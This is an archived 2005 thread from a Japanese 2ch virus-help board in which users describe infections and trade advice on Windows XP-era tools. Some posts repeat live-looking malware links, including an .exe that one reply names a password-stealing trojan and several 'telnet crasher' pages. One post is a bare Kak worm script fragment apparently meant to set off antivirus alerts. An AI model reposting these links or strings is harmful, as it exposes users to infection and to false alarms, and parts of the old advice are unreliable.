http://enchanting.cside.com/security/spybot1.html
spy botのダウンロードページです。
関係ないかも知れないけど1回試してみてください。
いろいろみつけてくれますよ。
563MONA ◆ApRjtwCQJQ :2005/11/29(火) 15:59:22
  ∧_∧
 ( ´∀`)  
 (    ) 
 | | |  
 (__)___)

>>561

セーフモードでのスキャンはやってみましたか?
564無名の初心者開発者:2005/11/29(火) 16:40:49
winnyのAntiny駆除を主とした対策ソフトを開発してみました。
ご意見ご感想をお聞かせいただければと思います。

現在Download板にてスレッド立ててみました。
よかったら参照を願います^^
http://tmp5.2ch.net/test/read.cgi/download/1133240829/l50
565名無しさん@お腹いっぱい。:2005/11/29(火) 18:03:01
>>394
昨日から見られないんだ。

>>395 コレみたいだな。
うちはAかBなんだけど危なそうだなぁ・・・
他に対策あれば教えてくれ。
566565 :2005/11/29(火) 18:05:45
どう見ても誤爆です。
本当にすみませんでした。
567名無しさん@お腹いっぱい。:2005/11/29(火) 18:45:38
>>555
>特定の文字列
2chブラウザ使ってる場合これをNGワードに指定しても駄目なの?それで回避できてる気がするんだけど
568名無しさん@お腹いっぱい。:2005/11/29(火) 19:16:56
>>567
ダメ。
569名無しさん@お腹いっぱい。:2005/11/29(火) 21:02:35
窓の手で自動実行ファイルを見ると

MSPY2002

が実行されています。MS=マイクロソフトなのかもしれませんが、
SPYだったらやだとおもって書き込みました。 これは安全ですか?
570名無しさん@お腹いっぱい。:2005/11/29(火) 21:10:05
ImScInst.exe (mspy2002) はインターネットExporer 内の
Japanese/Chinese のテキストを翻訳する為のマイクロソフトの
入力メッセージの編集者(IME) に属するプロセスである。
使い易さのためのこのプログラムはnon-essential プロセス, 取付けら れている。

だいじょうぶかもな。

Hijack Thisとかで、自分のプロセスやエントリを見ておくと、変なものが入るとすぐに分かるようになる。
PCをリカバリしたあとにおすすめ。
571名無しさん@お腹いっぱい。:2005/11/29(火) 21:35:25
>>564
Antinyは著作権侵害を撲滅する優良なウィルスだと思ってるのは俺だけですか?
572名無しさん@お腹いっぱい。:2005/11/29(火) 22:02:48
>>571
ACCSのサイトにDDOS攻撃仕掛ける亜種もあるのに?
573名無しさん@お腹いっぱい。:2005/11/29(火) 22:04:39
>>555のjaneなら対応できるというのはjane厨のガセでした
574571:2005/11/29(火) 22:09:19
>>572
そんな物があったとは・・・
575名無しさん@お腹いっぱい。:2005/11/29(火) 22:20:02
kak.hta';ken=wd+'START
576名無しさん@お腹いっぱい。:2005/11/29(火) 23:21:48
>>570
んなもん、ねーぞ。ググって見そ。
577名無しさん@お腹いっぱい。:2005/11/30(水) 00:37:24
【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 
ウイルスは特に発見されず。

【症状を具体的に、分かる限りすべて書く】
フォルダの表示項目が勝手に「縮小版」が選択されてしまう。
その後、「一覧」に変更してもまたしばらくすると元にもっどって
しまいます。おかげでjpgファイルを無理矢理見させられてしまう。

【何をしたらそんなことになったのか】
>>513さんと同じ症状で
SYSTEM32の中のIMEPADSV.EXEがTSPY_VB.AP
に感染しているとウイルスバスターに言われたので
IMEPADSV.EXEを削除しました。
578561:2005/11/30(水) 04:33:09
spybot1.4でスキャンしたら解決しました。

今まで1.3でやってたんですけどやっぱバージョンアップは大事ですね。
スパイウェアはノートン先生だけじゃだめなのが分りました。

アドバイスくれた方ありがとうございます&お騒がせしますた。
579名無しさん@お腹いっぱい。:2005/11/30(水) 07:06:46
こういうサイトは荒らす時にウイルス使うんだろうか?
http://www.freepe.jp/i.cgi?pogrom
580名無しさん@お腹いっぱい。:2005/11/30(水) 10:21:15
 人
(´ω`)
581TOWER:2005/11/30(水) 13:10:20
【使用OS】 WINXP SP1
【WindowsUpdateしてるか】 SP2がなんとなくいやでしてません(SP2以外はしています)
【AntiVirusは何を使っているか】 ノートンです
【ちゃんとUpdateしてるか】 最終UPDATE11/23になってました
【スキャンした結果(ウイルス名・発見場所)】 発見できません
【別のオンラインスキャンしたならその結果は】 しておりません
【症状を具体的に、分かる限りすべて書く】
メールを送ったら相手からウイルスメールが来たと苦情があり
聞けばこちらのメールを受け取っているときに「警告表示」
脅威名は「W32.Sober.X@mm!Zip」となっており、感染場所はN/A、感染頻度はまれ
と表示されたらしく お互いノートンで完全スキャンしたものの何も引っかからずです。
【何をしたらそんなことになったのか】
 MXなどのAVIファイルなどは見たことがありますが
 EXEファイルなどを起動したりはしていません
【これまでにとった措置】上記以上は何もしていません(どうしていいか分からない為)
【その他の質問】
 この状況ではこちらが(メール送信者)に問題があるのでしょうか?
 またノートンのスキャンで見つからない物に対してどう対処がありますでしょうか?
 ノートンいれてりゃ大丈夫だろ的な発想があり、かなりあせってます(初)ぜひご教授お願いします
582TOWER:2005/11/30(水) 13:12:25
【使用OS】 WINXP SP1
【WindowsUpdateしてるか】 SP2がなんとなくいやでしてません(SP2以外はしています)
【AntiVirusは何を使っているか】 ノートンです
【ちゃんとUpdateしてるか】 最終UPDATE11/23になってました
【スキャンした結果(ウイルス名・発見場所)】 発見できません
【別のオンラインスキャンしたならその結果は】 しておりません
【症状を具体的に、分かる限りすべて書く】
メールを送ったら相手からウイルスメールが来たと苦情があり
聞けばこちらのメールを受け取っているときに「警告表示」
脅威名は「W32.Sober.X@mm!Zip」となっており、感染場所はN/A、感染頻度はまれ
と表示されたらしく お互いノートンで完全スキャンしたものの何も引っかからずです。
【何をしたらそんなことになったのか】
 MXなどのAVIファイルなどは見たことがありますが
 EXEファイルなどを起動したりはしていません
【これまでにとった措置】上記以上は何もしていません(どうしていいか分からない為)
【その他の質問】
 この状況ではこちらが(メール送信者)に問題があるのでしょうか?
 またノートンのスキャンで見つからない物に対してどう対処がありますでしょうか?
 ノートンいれてりゃ大丈夫だろ的な発想があり、かなりあせってます(初)ぜひご教授お願いします
583名無しさん@お腹いっぱい。:2005/11/30(水) 13:14:09
584名無しさん@お腹いっぱい。:2005/11/30(水) 13:15:27
2度書くほど焦っているのか?


貴方のアドレスを詐称されたんじゃないの?
585名無しさん@お腹いっぱい。:2005/11/30(水) 13:20:45
>>583
>ご使用のコンピューターで W32.Sober.gen の感染として検出された場合には、このツールをダウンロードして実行してください。

だってそ
586TOWER:2005/11/30(水) 13:24:19
>584
なんだかこのBBS自体がうまく見れないんです
ノートン警告連発で・・・

>貴方のアドレスを詐称されたんじゃないの?
その人とは2回しか(送受)メールしていないんですが
それでも詐称されてしまう物なのでしょうか?
587TOWER:2005/11/30(水) 13:28:10
>>585
そうなんです 検出はされていないんです
(今は別PCからの書き込みです)
588583:2005/11/30(水) 13:32:15
W32.Sober.X@mm は、独自の SMTP エンジンを使用して拡散しセキュリティ設定を低下させる、
大量メール送信ワームです。
これは、侵入先のコンピュータから収集したメールアドレスに対して、E メールの添付ファイル
として自分自身を送信します。

だから、本体がいるんじゃないかと思っただけだよ。新しいウィルスだから、検出できないのと思ったんだけど。
589TOWER:2005/11/30(水) 13:34:49
>>588
定義ファイルが11/23と約1週間前なので もしかして
それで引っかからないんでしょうか?
今 該当PCがそばに無いんで試せませんが・・・
590名無しさん@お腹いっぱい。:2005/11/30(水) 15:01:14
【ソース】ウイルスセキュリティ2005EX Part15【K7】
400 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/11/30(水) 02:52:27
オレにはどうでもいいことなんだけども、
新種のノートントラップを2chに貼りまくっている犯人は、
主にNOD厨だと気付きつつある今日この頃(w
591名無しさん@お腹いっぱい。:2005/11/30(水) 15:18:49
http://www.google.co.jp/search?hl=ja&rls=GGLD%2CGGLD%3A2005-08%2CGGLD%3Aja&q=t2.exe&lr=

爆発的に書き込みが増えてるウィルス・・・
おととい140件、昨日12000件、今日14000件
ガクブル
592名無しさん@お腹いっぱい。:2005/11/30(水) 19:10:07
>>576
youのgoogleは壊れちゃっているの? それとも、fishing?

ttp://cowscorpion.com/tasklist/tasklist/i.html
のImScInst.exeを見てよ…

Hijack Thisのエントリ的には、こんな感じ。
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
593名無しさん@お腹いっぱい。:2005/11/30(水) 21:18:20
ネットカフェなどのPCってセキュリティーってどうなの?
マンボーやポパイなどよく利用しますが
594名無しさん@お腹いっぱい。:2005/11/30(水) 22:33:05
質問なんですけどウイルス感染したPCで宿泊などの予約を
した場合個人情報が漏れる可能性って高くなりますか?
感染したウイルスにもよると思うのですがどうなのでしょうか?
お願いします。
595名無しさん@お腹いっぱい。:2005/11/30(水) 22:44:51
>>594
キーロガーのことを心配しているのか(スパイウェアだ)。
個人情報については、別に電話帳に名前載せているだけで、漏れるわけだし
宿の人間が意図的に漏らすこともあるでしょう。漏れても泣かない、心構えが大切だと思うが。

特に、ネカフェから銀行振込み等する場合とか…
596571:2005/11/30(水) 22:46:53
>>593
法人向けのウィルスバスターとかあった気がする。

597名無しさん@お腹いっぱい。:2005/11/30(水) 22:50:30
>>595
ありがとうございます。
キーロガーというスパイウェアが個人情報を漏らすものなのか?
これってトレンドマイクロのオンラインスキャンとかで感染しているか
判断できるのでしょうか?
598名無しさん@お腹いっぱい。:2005/11/30(水) 23:01:22
出来る
599名無しさん@お腹いっぱい。:2005/11/30(水) 23:02:42
>>597
> これってトレンドマイクロのオンラインスキャンとかで感染しているか
> 判断できるのでしょうか?

普通は、ad-awareやspybotといったアンチスパイウェアソフトで検査すべきだと
思う。無料だし。
WindowsUpdateをきちんとし、Webを見ている最中に「はい」や「yes」を選択しない、
アンチウィルスソフトを入れ、ファイアウォールを入れ、IEを使う場合は、セキュリティ
レベルを「高」にし、できればInternet Explorer以外の(例えば、firefox)ブラウザを
使用すれば、まあ、安心だと思うよ。
600名無しさん@お腹いっぱい。:2005/12/01(木) 08:30:59
>>598
>>599
ありがとうございました。
勉強になりました。
601名無しさん@お腹いっぱい。:2005/12/01(木) 09:03:29
ありがとうございました。
どう見ても山田君でした。
602名無しさん@お腹いっぱい。:2005/12/01(木) 09:51:25
最近 あちこちの板に異常にコピペされてる、
http://www.geocities.jp/hiru072/

のアドに関するする情報ないでしょうか?
関係ないファイルを異常な数読み込みし、「情報ドットネット」というサイトに飛びますが、
明らかにダミーサイトです。

どなたかご存知ありませんでしょうか?
603名無しさん@お腹いっぱい。:2005/12/01(木) 19:38:58
>>602
スレ違い
604名無しさん@お腹いっぱい。:2005/12/01(木) 23:12:26
【使用OS】 Windows XP Home
【WindowsUpdateしてるか】 そこそこ
【AntiVirusは何を使っているか】 Avast
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】 C\WINDOWS\System32\hedgie.exe
【別のオンラインスキャンしたならその結果は】 特定されない
【症状を具体的に、分かる限りすべて書く】 わからない
【何をしたらそんなことになったのか】 いつのまにかに感染、HP閲覧が原因?
【これまでにとった措置】 Avastで削除。だけど、20分もたたないうちに復活してる
【その他の質問】
検索してみたんだけど、引っかからないんですが、あまり聞かないウイルスなんですかね?
何回も何回もすぐに復活してしまうので、Avastが反応しまくって困ってます
605名無しさん@お腹いっぱい。:2005/12/01(木) 23:27:29
こんなんでましたぁ〜

次に私がこの作用コンピュータ私の 破裂させたコンピュータ及び記憶棒でへハイジャックこの丸太ス キャンしなければならないほどその悪い。
どの助けも非常に認め られる。徴候はまた不具になる仕事のマネージャーを含み,
私が インターネットに接続とき私は特別なantispyware ソフトウェア がこのfrokm Spyaxe を特に取除くことを必要とするが,
複数の他 ぽんと鳴ら持ち上げること定数はメッセンジャーの窓を通って。

この 丸太を乗っ取りなさい:
                                                   google 訳


spyっつーことだよ。

やり方解るよな?
606名無しさん@お腹いっぱい。:2005/12/02(金) 00:43:26
>>605
お早い返事ありがとうございます
スパイウェアという事ですが、Avastは「トロイの木馬」として反応しています
ちなみにAd-aware、Spybotともに反応がありませんでした
607名無しさん@お腹いっぱい。:2005/12/02(金) 09:03:22
Ad-aware、Spybot が絶対というわけではないんだ。

セーフモードでスキャンしたらどうだったの?
608名無しさん@お腹いっぱい。:2005/12/02(金) 12:48:14
>>606
「トロイの木馬 スパイウェア」で検索すれば疑問は解決。
609名無しさん@お腹いっぱい。:2005/12/02(金) 15:04:33
>>606
a2とewidoでもスキャンしたら
それでもダメならHiJackThisのログ曝せ
610MONA ◆ApRjtwCQJQ :2005/12/02(金) 15:32:35
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>606
 | | |  \_____
 (__)___)

「システムの復元」を無効にしてやってみましたか。
611あぼーん:あぼーん
あぼーん
612名無しさん@お腹いっぱい。:2005/12/02(金) 22:16:09
>>610
お前な、そのコテハンやめろよ。
モナーはお前一人の物じゃないぞ。
613青蛙:2005/12/02(金) 22:32:25

スンマセン、ほんと始めたばかりで右も左も分からん者ダス、Avastを入れて
ネットしてたんですが、最初右隅にIPアドレスみたいなのと警告(英語なので無視してました)が
その後何かに感染(スキャンで発見できませんでした)したようで、メールを勝手に送信
しているようなのです。警告が出るときは、ページの閲覧中だったのですが、新しいページを開いたり
したときに限らず、最後に開いて20分位たっても出ました。アダルトも、
ソフトのインストールも極力避けて来ましたが、いったいどこから感染したの
でしょうか?閲覧だけで感染するものなのでしょうか?また、あの不可思議な
警告はいったい何だったのでしょうか。詳しい人お願いします。
また、質問の趣旨からテンプレを使ってませんが、その点はツッコま無いで下さい。
614名無しさん@お腹いっぱい。:2005/12/02(金) 22:37:25
nyかshare使ってるんだろ
615名無しさん@お腹いっぱい。:2005/12/02(金) 22:39:54
.txtファイルの日本語が全部黒い四角になってしまいます
コピペして.txtファイルではないとこ(たとえば2chへの書き込み)に貼るとちゃんと出る
【使用OS】WinXP HE
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】avast
【ちゃんとUpdateしてるか】してる
616名無しさん@お腹いっぱい。:2005/12/02(金) 22:47:53
オンラインスキャンしてみたら
Adware:adware/cws.aboutblank Windows レジストリ
とでましたググってもよく分からないのでお願いします
617名無しさん@お腹いっぱい。:2005/12/03(土) 01:37:08
>青蛙 >(英語なので無視してました)

PCの標準語は英語だよん。

世界中に迷惑掛ける気か?すぐケーブル引っこ抜け。
618名無しさん@お腹いっぱい。:2005/12/03(土) 01:52:44
>>613
> 最初右隅にIPアドレスみたいなのと警告(英語なので無視してました)が

avastは英語版使ってるの?
日本語版使ってるなら警告はavastじゃないな
何が警告出したんだ?
619青蛙:2005/12/03(土) 06:59:02
>617,618
avastは英語版を使ってます。他のソフトの関係から言語設定を中国語にして
いて日本語は文字化けするのでそうしてます。警告はavastからだと思います。
多分アタックを受けましたなどと言うアナウンスが有ったような記憶が有りますが
英語でよく分からなかった(何で攻撃されるの?)のと実害がなかったので無視してたわけです、、、
私の状況は

どこのサイトを訪れたか、どういうプログラムをインストールしているか、どのような
操作をしているか、およびメールアドレスなどを勝手に送信するもの (スパイウェア)

ということなのでしょうか。スパイウェアが何か、読んでも分からないし周りに聞ける人間
が居ません。私のパソコンは一体何をしているんでしょうか?何か他の人の迷惑になる
様な事をしてるのでしょうか?誰か教えてください。(長くなってすいません)
620名無しさん@お腹いっぱい。:2005/12/03(土) 07:27:26
>青蛙
あなたは自分のpc環境を全く書いていません
また、未だにネットに繋いでいて、無駄なトラフィックを
増大させ多くの人に迷惑を掛けています。
この段階では、たとえ2chといえども回答はないでしょう。
必要な事項をひとつずつこちらから聞き出すほど親切な場ではないのです。
ネットの世界は無知は己の命取りになります。
基本的なセキュリティーの勉強をお勧めします。

この際きれいにリカバリーされてはいかがですか?

もし不可でしたら ↓ここ行って、テンプレをセーフモードで全部やってください。

【総合】スパイウェア予防駆除 Part9
http://pc8.2ch.net/test/read.cgi/sec/1126945498/

最後に これでも退治出来ないRootkitsなるものがあります。
それは上記のスレで質問してください。

再度、リカバリーをお勧めします。
621名無しさん@お腹いっぱい。:2005/12/03(土) 07:38:18
>>619
日本語のウェブは読めるという前提で、とりあえず参考になりそうなところを

ttp://enchanting.cside.com/security/spyware.html
スパイウェアの概要と一般的なツールが紹介されてるから
最初はここをチェック

ttp://www.higaitaisaku.com/
一通りやってみてもまだおかしいようならHiJackThisの
ログをとってこのサイトで研究

ttp://www.ipa.go.jp/security/antivirus/shiori.html
ウイルスもスパイウェアも予防が基本だから、こんなところも
読んどくといいかも
622青蛙:2005/12/03(土) 07:48:44
>620、621
皆さんご親切にどうもありがとうございます。リカバリーは何度か試しましたが、
その都度 感染−>リカバー>感染 の繰り返しでした。
上記を参考にして自分なりに研究してみます。
623名無しさん@お腹いっぱい。:2005/12/03(土) 07:53:18
OSくらいは書いたら?

そうすれば感染しない順序がわかるんだよ。
624青蛙:2005/12/03(土) 08:36:13
今更ですが自分の環境を書き直してみます。
【使用OS】winXP
【WindowsUpdateしてるか】 してない
【AntiVirusは何を使っているか】 avast&Ad-Aware
【ちゃんとUpdateしてるか】 してる
【スキャンした結果(ウイルス名・発見場所)】 avastは発見なし、
Ad-Awareは毎回引っかかるTrackingCookieの項目がいくつか表示される。
【症状を具体的に、分かる限りすべて書く】
複数有るようですが、起動時にwincupdaterという項目がCドライブに自動的にできる。
右隅に青色の箱に手紙の挟まったような表示が出る
【何をしたらそんなことになったのか】
さっぱり分かりません閲覧かな?
【これまでにとった措置】 ADかAVASTに引っかかればREMOVE
【その他の質問】あの青色の箱は何を意味しているんでしょう。
625青蛙:2005/12/03(土) 08:40:04
ちょっと書き間違えた。wincupdaterが出来るのは起動時、
それとwincupdaterとは何なんでしょうか?検索しても出てきません
626青蛙:2005/12/03(土) 08:46:54
また書き直しです、起動時では無くネット接続時 と書きたかったんですが、
焦って間違えてしまいました。レス無駄にしてすいません。
次からは書き込む前にちゃんとチェックします。
627名無しさん@お腹いっぱい。:2005/12/03(土) 09:12:57
628名無しさん@お腹いっぱい。:2005/12/03(土) 09:22:01
>【WindowsUpdateしてるか】 してない

windowsupdateの重要性が分かるまでネットに繋がないでください。
629名無しさん@お腹いっぱい。:2005/12/03(土) 11:33:07
>【WindowsUpdateしてるか】 してない

助言してやる気も起きないのでもう来るな!
勝手にガンガン感染していていいよ。気にすんな。
630青蛙:2005/12/03(土) 13:12:17
>628,629 仰ることはごもっともです。重要性は分かったつもりです

取り合えずリカバリーしてみようと思いますが、その後どんな対策ソフトの
組み合わせが一番いいのでしょうか。前はavast&Ad-Aware でだめでしたが・
(Updateしていないのが一番大きな原因かも)・・・
条件
【使用OS】winXP
【言語】設定が中国語というのは変えられないので英語もしくは中国語の
ソフトを 日本語ソフトは起動しないか文字化けします。
【その他】フリーソフトでダウンロードできるもので。

それとwincupdaterと 手紙が挟まった青い箱のようなものは何なのか
分かる人が居たらお願いします。
631名無しさん@お腹いっぱい。:2005/12/03(土) 14:20:14
>wincupdater
>>627には何が書いてあったのだろう?
英語ではない。イタリア語かなぁ・・・
632名無しさん@お腹いっぱい。:2005/12/03(土) 15:53:19
下のアドレスを踏んでしまったところ、
DOS画面が出て、トロイに感染してしまったようです。
ノートンでも駆除ができないのですが、どうしたら駆除できますか?

tp://dailynews.bravehost.com/Society/20051203-00000009-kyodo-soci.html
633名無しさん@お腹いっぱい。:2005/12/03(土) 15:57:28
トロイ本体を自分で削除する。
(セーフモードか、トロイのプロセスを切る)
634名無しさん@お腹いっぱい。:2005/12/03(土) 16:01:02
>>633
お早い回答ありがとうございます。
早速試してみます。
635 :2005/12/03(土) 16:03:23
すみません。SOSです。
初心者ですがウイルスにかかって
しまったみたいなんです。アーティストのPVをみようとすると
画面がいきなり真っ暗になります。(何も操作できない)
ちなみに黒くなったあと画面が昔の?画面になってしますんです。
再起動する元に戻ります。これはどうすればいいですか?
636名無しさん@お腹いっぱい。:2005/12/03(土) 16:05:28
>>632
ウンコTelnetは何にも感染しないから書き込むんじゃねぇ
637名無しさん@お腹いっぱい。:2005/12/03(土) 17:13:07
ttp://ex14.2ch.net/test/read.cgi/news4vip/1133594514/
ここの>>1が貼ったZIPの中身が気になるので誰か調べてもらえませんか?
638名無しさん@お腹いっぱい。:2005/12/03(土) 17:17:36
 
639名無しさん@お腹いっぱい。:2005/12/03(土) 17:18:32
>>637
やばい・・・欲しいファイルがどんどん手に入る
640637:2005/12/03(土) 17:19:32
自己解決しました
641名無しさん@お腹いっぱい。:2005/12/03(土) 17:20:00
>>637
問題ない
642名無しさん@お腹いっぱい。:2005/12/03(土) 17:20:47
>>637
すごす
643名無しさん@お腹いっぱい。:2005/12/03(土) 17:23:41
>>639-642
ありがとうございました
644名無しさん@お腹いっぱい。:2005/12/03(土) 17:34:15
>>636
返事が遅れてしまったのですが、ありがとうございました
645名無しさん@お腹いっぱい。:2005/12/03(土) 17:53:53
【使用OS】Windows XP home sp2
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】バスター2006
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】正常
【別のオンラインスキャンしたならその結果は】ノートンオンラインスキャンも正常
【症状を具体的に、分かる限りすべて書く】なし
【これまでにとった措置】Ad-awareとSpybotでも異常なし
【その他の質問】

ttp://sportsnavi.bravehost.com/fight/K1/20051125-00000008-kyodo_sp-spo.html

ウイルスらしいのですが画像が表示されるだけで
スキャン等しても異常ありません。

スキャンしても何も検出されないのですが、ウイルスではないのでしょうか?
それとも、バスターやノートンでは反応しないのでしょうか?
よろしくお願いします
646名無しさん@お腹いっぱい。:2005/12/03(土) 17:58:07
>>645
ウンコtelnetを貼りにわざわざ来てんじゃねえよ タコが
647名無しさん@お腹いっぱい。:2005/12/03(土) 18:16:05
>>645
アクセスする時間帯やそれぞれのPC環境によっても変化するものだから、
検出されないなら感染してないってこと。
bravehost系でも非活動のものも多いから。
あと、観覧するブラウザの種類によっても変化する。
ちなみにsp2+FFだとグロ画像、PC無害。
648 :2005/12/03(土) 20:42:07
突然すいませんwindows media playerでPVをみようとすると
画面が真っ暗になり、すこし時間がたつと
復活するのですが、画像が荒くなり、
色が薄くなるのですがこれはウイルスですか?
649名無しさん@お腹いっぱい。:2005/12/03(土) 20:47:40
>>648
それはコーデックの問題では?
650名無しさん@お腹いっぱい。:2005/12/03(土) 22:34:29

tp://dynabook.com/pc/catalog/ss/031204m2/index_j.htm

ここにアクセスしたとたん、IEやマイコンピュータ、アウトルックなどに異常が出ました。
どのプログラムも、(操作していないのに)トップの階層へのぼってしまいます。
たとえばIEですと、お気に入りから何かのページにアクセスしても、
すぐさま強制的にホームページに戻ってしまいます。
651名無しさん@お腹いっぱい。:2005/12/03(土) 22:37:38
>>650
再起動してもう一回やってみ?
652650:2005/12/03(土) 23:42:50
>>651の御人
ノートンでスキャンした結果、何も検知できず。
ご指摘のように再起動したら、元に戻りました。
いったいこれは。。。
よければ解説しているページなどを教えていただけませんか。

ここに書き込む前にグーグルで
「ウイルス 戻る インターネットエクスプローラ」やら
「ウイルス 階層 マイコンピュータ」などといったキーワードで検索したものの、
似た症状が見つかりませんでした。
653名無しさん@お腹いっぱい。:2005/12/04(日) 01:15:39
【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウイルス
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】EPXActiveX.ocx というファイルを二個、それぞれC:\windows\Downloaded Program
Files内で見つける
【症状を具体的に、分かる限りすべて書く】
ネット中に広告がやたら表示
【これまでにとった措置】
ウイルススキャンで発見し、削除を試みるができず、直接ファイルを探して削除しようとするがファイルが表示されず、Winの検索でも見当たらない。
隠しファイルかと思い、フォルダオプションをいじるも効果なし。

どうしたらいいのでしょう?
ご教授お願いします。
654名無しさん@お腹いっぱい。:2005/12/04(日) 08:46:31
ググレば何の問題も無し
655名無しさん@お腹いっぱい。:2005/12/04(日) 09:05:41
>>653
何にでもハイハイとクリックするからだよ
656名無しさん@お腹いっぱい。:2005/12/04(日) 10:03:46
>>653
スパイの方でそ。
657名無しさん@お腹いっぱい。:2005/12/04(日) 13:03:37
bb2.exeというファイルをダウンロードしてAvast!とVirusBusterでスキャンしても
ウィルスとは認識されませんでした
しかし、他の方からはトロイであるとの指摘がありました
私の環境でも実行後はトロイであるとの結果か出ましたがが
実行せずにexeファイルの中身を調べる方法が有るのでしょうか?
658名無しさん@お腹いっぱい。:2005/12/04(日) 13:38:40
【使用OS】Windows XP
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】ノートンインターネットセキュリティ2004(1年追加更新済)
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】検知されず
【別のオンラインスキャンしたならその結果は】トレンドマイクロでスキャン、検知されず
【症状を具体的に、分かる限りすべて書く】
昨日から「MSRPCSS Attack(2)」の警告が何度も出る。
どれも同じ韓国あたりのPCを踏み台にした同一の侵入の疑いあり
それと前後して、パソコンの立ち上がりが遅くなったり、
ブラウザ(IE6)がいきなり開いたりするのと関係があるのか?
「MSRPCSS Attack」自体が日本語対応で見つからず、一体どんなものなのか
わからずどう対応してよいものかわかりません。
【これまでにとった措置】Spybot3.1でスキャン、検知されず

警告がでるということは、はじいてくれているのだと思うのですが、
何度も同じ地域から攻撃がきているのと、パソコンの調子が悪いのが
ひっかかっています。
攻撃の具体的な内容だけでもわかれば対応もできるのですが・・・。
なにとぞ、お知恵をお貸しください。
659名無しさん@お腹いっぱい。:2005/12/04(日) 13:55:24
SP2にしてからまたおいで。
660名無しさん@お腹いっぱい。:2005/12/04(日) 14:47:06
661名無しさん@お腹いっぱい。:2005/12/04(日) 15:01:25
>>660
有難う御座いました!
662名無しさん@お腹いっぱい。:2005/12/04(日) 15:20:37
( ^3^)≡○#) 3・)∴.;
663名無しさん@お腹いっぱい。:2005/12/04(日) 15:35:32
急に音量がでかくなってしまう時があるんですが
そんなウィルスってありますか?

NOD & Spybotでは検出なしでした(´・ω・`)
664名無しさん@お腹いっぱい。:2005/12/04(日) 15:40:14
バイドクター使えば直るよ
665名無しさん@お腹いっぱい。:2005/12/04(日) 16:15:40
197 名前: sterfite [[email protected]] 投稿日: 2005/12/04(日) 16:05:25 ID:KYq98hzQ

l2.exe の不具合申請でGM回答
HTTP://Www.guoxuecn.com/photo/hoyoo.exe
新着レス 2005/12/04(日) 16:10


こわくて踏めません
666名無しさん@お腹いっぱい。:2005/12/04(日) 16:22:49
>>665
トロイみたいだ。有害。でもスレ違い
ArcaVir Win32
BitDefender BehavesLike:Win32.AV-Killer (probable variant)
Dr.Web Trojan.PWS.Lineage
Kaspersky Anti-Virus Trojan-PSW.Win32.Lineage.qp
NOD32 a variant of Win32/PSW.Lineage
667名無しさん@お腹いっぱい。:2005/12/04(日) 16:24:31
>>665
>>657と同じだと思われる。

誘導
勇気が無くて見られない画像解説スレ Part760
http://etc3.2ch.net/test/read.cgi/entrance/1133451731/
668名無しさん@お腹いっぱい。:2005/12/04(日) 19:39:37
winnyを実行すると、「ぬるぽ オートラン」等の画面が表示され、田中康夫知事のスクリーンセーバー(kimmo)に変更されるウィルスに感染しました。
ctrl+alt+delでタスクマネージャ起動されなくなりました。これだけでも直したいのですがどうすれば直りますでしょうか?
【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウイルス
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】発見できず
669名無しさん@お腹いっぱい。:2005/12/04(日) 19:49:04
帰れ!
670名無しさん@お腹いっぱい。:2005/12/04(日) 19:58:43
>>668
いい様だなw素人がwinnyなんかやるなよカス
671名無しさん@お腹いっぱい。:2005/12/04(日) 22:42:50
      ∧∧  
〜′ ̄ ̄( ゚Д゚)
 UU ̄ ̄ U U  
672名無しさん@お腹いっぱい。:2005/12/05(月) 20:41:46
tp://tmp5.2ch.net/test/read.cgi/download/1129317367/
↑このスレ開いたら(今はdat落ちしてますが)画面が急に赤くなって(ブルースクリーンのレッド版みたいなもの)
「ウイルスを発見しました」みたいな表示が出ました。
慌てて回線切ってケーブル抜いて再起動→DiskX ToolsでIEキャッシュを削除→ノートン2005でスキャンしました。
【使用OS】 Me
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 ノートンアンチウイルス2005
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】ウイルスはありませんでした。トレンドマイクロのオンラインスキャンも試してみたのですが、問題ありませんでした。
今現在一応普通に使えてます。

大丈夫なのでしょうか・・・・?
673名無しさん@お腹いっぱい。:2005/12/05(月) 20:42:38
ageてしまいましたすみません・・・・吊ってきますorz
674名無しさん@お腹いっぱい。:2005/12/05(月) 20:50:02
>>672
大丈夫。スレ開いて、ノートンが反応したなら、ウィルスコードに反応しただけだろ。
詳しくは↓ 最初の方に色々書いてある。
【ノートン】インターネットセキュリティ Ver.79【2006】
http://pc8.2ch.net/test/read.cgi/sec/1133673099/
675名無しさん@お腹いっぱい。:2005/12/05(月) 21:43:56
【使用OS】Windows XP Pro sp2
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】ノートンアンチビールス2003
【ちゃんとUpdateしてるか】はい
【スキャンした結果(ウイルス名・発見場所)】全ファイルしましたが正常
【別のオンラインスキャンしたならその結果は】なし
【症状を具体的に、分かる限りすべて書く】踏んだときrundllが正常じゃないってエラーが出た
【これまでにとった措置】 スナップショットを一日前に戻した
【その他の質問】

tp://www.trasher.ru/foto/trasher/trasher.jpg
こいつを誤って踏んでしまいました・・・orz
新種ウイルスだそうで・・・
対処法を教えていただければ非常にありがたいです。
何卒!

676名無しさん@お腹いっぱい。:2005/12/05(月) 21:50:57
>>675
ほう telnetクラッシャーが新種なのかい
おめでたいのう どこのベンダーが新種だと言い張っているんか聞きたいのう
677675:2005/12/05(月) 21:59:55
>>676
telnetクラッシャーってブラクラみたいなもんですか?
何ともないのなら安心なのですがどうか対処法を教えてください
